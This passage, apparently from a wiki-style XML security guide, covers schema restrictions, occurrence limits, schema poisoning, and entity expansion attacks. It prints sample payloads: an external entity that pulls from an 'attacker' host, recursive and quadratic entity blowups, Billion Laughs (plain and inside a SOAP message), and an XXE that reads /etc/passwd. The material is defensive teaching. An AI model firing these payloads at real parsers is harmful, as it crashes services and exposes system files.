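&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;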
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
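&lt;br /&gt;
The &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; facet belongs to XML Schema 1.1, so a validator that only implements XML Schema 1.0 will not accept it. A hedged alternative for such validators, assuming that a union of built-in types is acceptable for the application, is to combine the two integer types that exclude zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- Any integer below zero or above zero; zero matches neither member type --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:union memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;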
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Failing to define a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
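&lt;br /&gt;
A bounded variant might look like the following sketch. The ceiling of 100 is an assumed value that should come from testing the application, and &amp;lt;tt&amp;gt;buyType&amp;lt;/tt&amp;gt; is a hypothetical named complex type standing in for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; definition:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Assumed ceiling: at most 100 buy elements per operation --&amp;gt;&lt;br /&gt;
      &amp;lt;!-- buyType is a hypothetical complex type defined elsewhere in the schema --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;buy&amp;quot; type=&amp;quot;buyType&amp;quot; maxOccurs=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;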
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, it must include a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these files are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. The connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
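&lt;br /&gt;
The asymmetry between what the attacker sends and what the parser must hold in memory can be worked out with simple arithmetic. The following Python sketch uses the figures from the example above; the constant names are illustrative, and the sent size ignores the few bytes of surrounding markup.&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000      # characters in the replacement text of entity A
REFERENCE_COUNT = 100_000    # number of references to A in the document body
REFERENCE_TEXT_LENGTH = 3    # each reference is written with three characters

# Approximate size of the document as sent by the attacker.
sent = ENTITY_LENGTH + REFERENCE_COUNT * REFERENCE_TEXT_LENGTH

# Size of the text after every reference has been expanded.
expanded = ENTITY_LENGTH * REFERENCE_COUNT

print(sent)              # 400000
print(expanded)          # 10000000000
print(expanded // sent)  # 25000
```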
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities declared in the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, or 3*10^9 (3,000,000,000) characters, which could make the parser crash. &lt;br /&gt;
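&lt;br /&gt;
The growth at each nesting level can be tabulated with a few lines of Python. This is only a sketch of the arithmetic, assuming a fan-out of 10 at each of the nine levels as in the DTD above; the constant names are illustrative.&lt;br /&gt;

```python
FANOUT = 10          # references per entity definition (LOL1 to LOL9)
LEVELS = 9           # LOL1 through LOL9
BASE_TEXT = "LOL"    # replacement text of the innermost entity

copies = 1
for level in range(1, LEVELS + 1):
    copies *= FANOUT
    print(f"LOL{level}: {copies:,} copies, {copies * len(BASE_TEXT):,} characters")

total_characters = copies * len(BASE_TEXT)
# The last line printed is:
# LOL9: 1,000,000,000 copies, 3,000,000,000 characters
```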
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE soap:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;soap:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;soap:Body&amp;gt; &lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
&amp;lt;/soap:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
